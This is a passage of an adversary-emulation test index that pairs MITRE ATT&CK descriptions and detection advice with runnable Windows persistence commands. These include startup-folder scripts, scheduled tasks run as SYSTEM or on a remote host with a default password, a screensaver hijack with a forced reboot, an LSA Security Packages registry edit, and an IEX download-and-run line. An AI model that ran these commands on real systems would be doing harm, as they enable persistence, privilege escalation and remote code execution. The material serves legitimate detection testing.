JSE!\" will - be displayed twice. 
\nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start - Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted - and the user logs in.\n" - supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" - Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" - cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" - cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore - Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Suspicious bat file run from startup Folder - auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e - description: | - bat files can be placed in and executed from the startup folder to maintain persistance. - Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" - folder and will also run when the computer is restarted and the user logs in. 
- supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" - Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" - Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" - Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore - Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Add Executable Shortcut Link to User Startup Folder - auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d - description: 'Adds a non-malicious executable shortcut link to the current users - startup directory. Test can be verified by going to the users startup directory - and checking if the shortcut link exists. ' - supported_platforms: - - windows - executor: - command: "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation - = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell - = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath - = $Target\n$Create.Save() " - cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start - Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore - name: powershell - elevation_required: true - T1134.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1134.005 - url: https://attack.mitre.org/techniques/T1134/005 - - url: https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx - description: Microsoft. (n.d.). Security Identifiers. 
Retrieved November 30, - 2017. - source_name: Microsoft SID - - url: https://msdn.microsoft.com/library/ms679833.aspx - description: Microsoft. (n.d.). Active Directory Schema - SID-History attribute. - Retrieved November 30, 2017. - source_name: Microsoft SID-History Attribute - - url: https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems - description: Microsoft. (2017, June 23). Well-known security identifiers in - Windows operating systems. Retrieved November 30, 2017. - source_name: Microsoft Well Known SIDs Jun 2017 - - url: https://technet.microsoft.com/library/ee617241.aspx - description: Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved - November 30, 2017. - source_name: Microsoft Get-ADUser - - url: https://adsecurity.org/?p=1772 - description: 'Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence - #14: SID History. Retrieved November 30, 2017.' - source_name: AdSecurity SID History Sept 2015 - - url: https://msdn.microsoft.com/library/ms677982.aspx - description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November - 30, 2017. - source_name: Microsoft DsAddSidHistory - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: SID-History Injection - description: |- - Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens). 
- - With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028). - id: attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-26T21:49:31.964Z' - created: '2020-02-18T18:34:49.414Z' - x_mitre_contributors: - - Alain Homewood, Insomnia Security - - Vincent Le Toux - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Examine data in user’s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory) - - Monitor for Windows API calls to the DsAddSidHistory function. 
(Citation: Microsoft DsAddSidHistory) - x_mitre_data_sources: - - Windows event logs - - Authentication logs - - API monitoring - x_mitre_platforms: - - Windows - atomic_tests: [] - T1053.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.005 - url: https://attack.mitre.org/techniques/T1053/005 - - url: https://twitter.com/leoloobeek/status/939248813465853953 - description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved - December 12, 2017. - source_name: Twitter Leoloobeek Scheduled Task - - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen - description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention - settings. Retrieved December 12, 2017. - source_name: TechNet Forum Scheduled Task Operational Setting - - url: https://technet.microsoft.com/library/dd315590.aspx - description: Microsoft. (n.d.). General Task Registration. Retrieved December - 12, 2017. - source_name: TechNet Scheduled Task Events - - source_name: Microsoft Scheduled Task Events Win10 - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events - description: Microsoft. (2017, May 28). Audit Other Object Access Events. - Retrieved June 27, 2019. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Scheduled Task - description: |- - Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. 
The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. - - The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel. - - An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). - id: attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T13:45:03.730Z' - created: '2019-11-27T14:58:00.429Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. 
- - Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) - - * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered - * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated - * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted - * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created - * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled - * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) - - Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data. - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows event logs - x_mitre_platforms: - - Windows - identifier: T1053.005 - atomic_tests: - - name: Scheduled Task Startup Script - auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2 - description: | - Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view - the tasks, open the Task Scheduler and look in the Active Tasks pane. 
- supported_platforms: - - windows - executor: - command: | - schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" - schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" - cleanup_command: | - schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1 - schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1 - name: command_prompt - elevation_required: true - - name: Scheduled task Local - auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71 - description: 'Upon successful execution, cmd.exe will create a scheduled task - to spawn cmd.exe at 20:10. - -' - supported_platforms: - - windows - input_arguments: - task_command: - description: What you want to execute - type: String - default: C:\windows\system32\cmd.exe - time: - description: What time 24 Hour - type: String - default: 72600 - executor: - name: command_prompt - elevation_required: false - command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - -' - cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - -' - - name: Scheduled task Remote - auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd - description: | - Create a task on a remote system. - - Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. 
- supported_platforms: - - windows - input_arguments: - task_command: - description: What you want to execute - type: String - default: C:\windows\system32\cmd.exe - time: - description: What time 24 Hour - type: String - default: 72600 - target: - description: Target - type: String - default: localhost - user_name: - description: 'Username to authenticate with, format: DOMAIN\User' - type: String - default: DOMAIN\user - password: - description: Password to authenticate with - type: String - default: At0micStrong - executor: - name: command_prompt - elevation_required: true - command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN - "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - -' - cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} - /TN "Atomic task" /F >nul 2>&1 - -' - - name: Powershell Cmdlet Scheduled Task - auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd - description: | - Create an atomic scheduled task that leverages native powershell cmdlets. - - Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. - supported_platforms: - - windows - executor: - name: powershell - elevation_required: false - command: | - $Action = New-ScheduledTaskAction -Execute "calc.exe" - $Trigger = New-ScheduledTaskTrigger -AtLogon - $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest - $Set = New-ScheduledTaskSettingsSet - $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set - Register-ScheduledTask AtomicTask -InputObject $object - cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false - >$null 2>&1 - -' - - name: Task Scheduler via VBA - auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 - description: | - This module utilizes the Windows API to schedule a task for code execution (notepad.exe). 
The task scheduler will execute "notepad.exe" within - 30 - 40 seconds after this module has run - supported_platforms: - - windows - input_arguments: - ms_product: - description: Maldoc application Word - type: String - default: Word - dependency_executor_name: powershell - dependencies: - - description: 'Microsoft #{ms_product} must be installed - -' - prereq_command: | - try { - New-Object -COMObject "#{ms_product}.Application" | Out-Null - $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} - Stop-Process -Name $process - exit 0 - } catch { exit 1 } - get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} - manually to meet this requirement" - -' - executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" - -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" - -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" - name: powershell - - name: WMI Invoke-CimMethod Scheduled Task - auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b - description: 'Create an scheduled task that executes notepad.exe after user - login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing - as Register-ScheduledTask cmdlet behind the scenes. 
- -' - supported_platforms: - - windows - executor: - name: powershell - elevation_required: true - command: | - $xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml") - Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; } - cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false - >$null 2>&1 - -' - T1053: - technique: - created: '2017-05-31T21:30:46.977Z' - modified: '2020-10-14T15:20:01.069Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Scheduled Task/Job - description: |- - Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) - - Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). 
- external_references: - - source_name: mitre-attack - external_id: T1053 - url: https://attack.mitre.org/techniques/T1053 - - external_id: CAPEC-557 - source_name: capec - url: https://capec.mitre.org/data/definitions/557.html - - url: https://technet.microsoft.com/en-us/library/cc785125.aspx - description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved - June 8, 2016. - source_name: TechNet Task Scheduler Security - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - x_mitre_platforms: - - Windows - - Linux - - macOS - x_mitre_remote_support: true - x_mitre_effective_permissions: - - SYSTEM - - Administrator - - User - x_mitre_permissions_required: - - Administrator - - SYSTEM - - User - x_mitre_detection: "Monitor scheduled task creation from common utilities using - command-line invocation. Legitimate scheduled tasks may be created during - installation of new software or through system administration functions. Look - for changes to tasks that do not correlate with known software, patch cycles, - etc. \n\nSuspicious program execution through scheduled tasks may show up - as outlier processes that have not been seen before when compared against - historical data. Data and events should not be viewed in isolation, but as - part of a chain of behavior that could lead to other activities, such as network - connections made for Command and Control, learning details about the environment - through Discovery, and Lateral Movement." 
- x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs - x_mitre_contributors: - - Prashant Verma, Paladion - - Leo Loobeek, @leoloobeek - - Travis Smith, Tripwire - - Alain Homewood, Insomnia Security - x_mitre_version: '2.0' - x_mitre_is_subtechnique: false - atomic_tests: [] - T1546.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.002 - url: https://attack.mitre.org/techniques/T1546/002 - - source_name: Wikipedia Screensaver - description: Wikipedia. (2017, November 22). Screensaver. Retrieved December - 5, 2017. - url: https://en.wikipedia.org/wiki/Screensaver - - source_name: ESET Gazer Aug 2017 - description: 'ESET. (2017, August). Gazing at Gazer: Turla’s new second stage - backdoor. Retrieved September 14, 2017.' - url: https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Screensaver - description: |- - Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations. 
- - The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence: - - * SCRNSAVE.exe - set to malicious PE path - * ScreenSaveActive - set to '1' to enable the screensaver - * ScreenSaverIsSecure - set to '0' to not require a password to unlock - * ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed - - Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017) - id: attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-23T12:23:04.955Z' - created: '2020-01-24T13:51:01.210Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior. - - Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated. - x_mitre_data_sources: - - File monitoring - - Windows Registry - - Process command-line parameters - - Process monitoring - x_mitre_contributors: - - Bartosz Jerzman - x_mitre_platforms: - - Windows - identifier: T1546.002 - atomic_tests: - - name: Set Arbitrary Binary as Screensaver - auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64 - description: 'This test copies a binary into the Windows System32 folder and - sets it as the screensaver so it will execute for persistence. Requires a - reboot and logon. 
- -' - supported_platforms: - - windows - input_arguments: - input_binary: - description: Executable binary to use in place of screensaver for persistence - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr" - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f - shutdown /r /t 0 - name: command_prompt - elevation_required: true - T1547.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.005 - url: https://attack.mitre.org/techniques/T1547/005 - - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html - description: Graeber, M. (2014, October). Analysis of Malicious Security Support - Provider DLLs. Retrieved March 1, 2017. - source_name: Graeber 2014 - - url: https://technet.microsoft.com/en-us/library/dn408187.aspx - description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. - Retrieved June 24, 2015. - source_name: Microsoft Configure LSA - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Security Support Provider - description: |- - Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. 
- - The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) - id: attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T15:42:48.910Z' - created: '2020-01-24T17:16:11.806Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: 'Monitor the Registry for changes to the SSP Registry keys. - Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 - R2 may generate events when unsigned SSP DLLs try to load into the LSA by - setting the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber - 2014) (Citation: Microsoft Configure LSA)' - x_mitre_data_sources: - - DLL monitoring - - Windows Registry - - Loaded DLLs - x_mitre_platforms: - - Windows - identifier: T1547.005 - atomic_tests: - - name: Modify SSP configuration in registry - auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e - description: Add a value to a Windows registry SSP key, simulating an adversarial - modification of those keys. - supported_platforms: - - windows - input_arguments: - fake_ssp_dll: - description: Value added to registry key. Normally refers to a DLL name - in C:\Windows\System32. 
- type: String - default: not-a-ssp - executor: - command: | - # run these in sequence - $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' - $SecurityPackagesUpdated = $SecurityPackages - $SecurityPackagesUpdated += "#{fake_ssp_dll}" - Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated - - # revert (before reboot) - Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages - name: powershell - elevation_required: true - T1574.010: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.010 - url: https://attack.mitre.org/techniques/T1574/010 - - external_id: CAPEC-17 - source_name: capec - url: https://capec.mitre.org/data/definitions/17.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Services File Permissions Weakness - description: |- - Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. 
- - Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. - id: attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T19:10:04.262Z' - created: '2020-03-12T20:43:53.998Z' - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_data_sources: - - Process command-line parameters - - Services - - File monitoring - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - - Administrator - - User - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: "Look for changes to binaries and service executables that - may normally occur during software updates. If an executable is written, renamed, - and/or moved to match an existing service executable, it could be detected - and correlated with other suspicious behavior. Hashing of binaries and service - executables could be used to detect replacement against historical data.\n\nLook - for abnormal process call trees from typical processes and services and for - execution of other commands that could relate to Discovery or other adversary - techniques. 
" - x_mitre_platforms: - - Windows - atomic_tests: [] - T1574.011: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.011 - url: https://attack.mitre.org/techniques/T1574/011 - - external_id: CAPEC-478 - source_name: capec - url: https://capec.mitre.org/data/definitions/478.html - - source_name: Registry Key Security - url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN - description: Microsoft. (2018, May 31). Registry Key Security and Access Rights. - Retrieved March 16, 2017. - - source_name: Kansa Service related collectors - url: https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html - description: 'Hull, D.. (2014, May 3). Kansa: Service related collectors and - analysis. Retrieved October 10, 2019.' - - source_name: Tweet Registry Perms Weakness - url: https://twitter.com/r0wdy_/status/936365549553991680 - description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved - April 9, 2018." - - source_name: Autoruns for Windows - url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. - Retrieved March 13, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Services Registry Permissions Weakness - description: "Adversaries may execute their own malicious payloads by hijacking - the Registry entries used by services. Adversaries may use flaws in the permissions - for registry to redirect from the originally specified executable to one that - they control, in order to launch their own code at Service start. Windows - stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. 
- The information stored under a service's Registry keys can be manipulated - to modify a service's execution parameters through tools such as the service - controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), - or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys - is controlled through Access Control Lists and permissions. (Citation: Registry - Key Security)\n\nIf the permissions for users and groups are not properly - set and allow access to the Registry keys for a service, then adversaries - can change the service binPath/ImagePath to point to a different executable - under their control. When the service starts or is restarted, then the adversary-controlled - program will execute, allowing the adversary to gain persistence and/or privilege - escalation to the account context the service is set to execute under (local/domain - account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also - alter Registry keys associated with service failure parameters (such as FailureCommand) - that may be executed in an elevated context anytime the service fails or is - intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: - Tweet Registry Perms Weakness) " - id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T19:07:48.590Z' - created: '2020-03-13T11:42:14.444Z' - x_mitre_defense_bypassed: - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Service changes are reflected in the Registry. Modification to existing services should not occur frequently. 
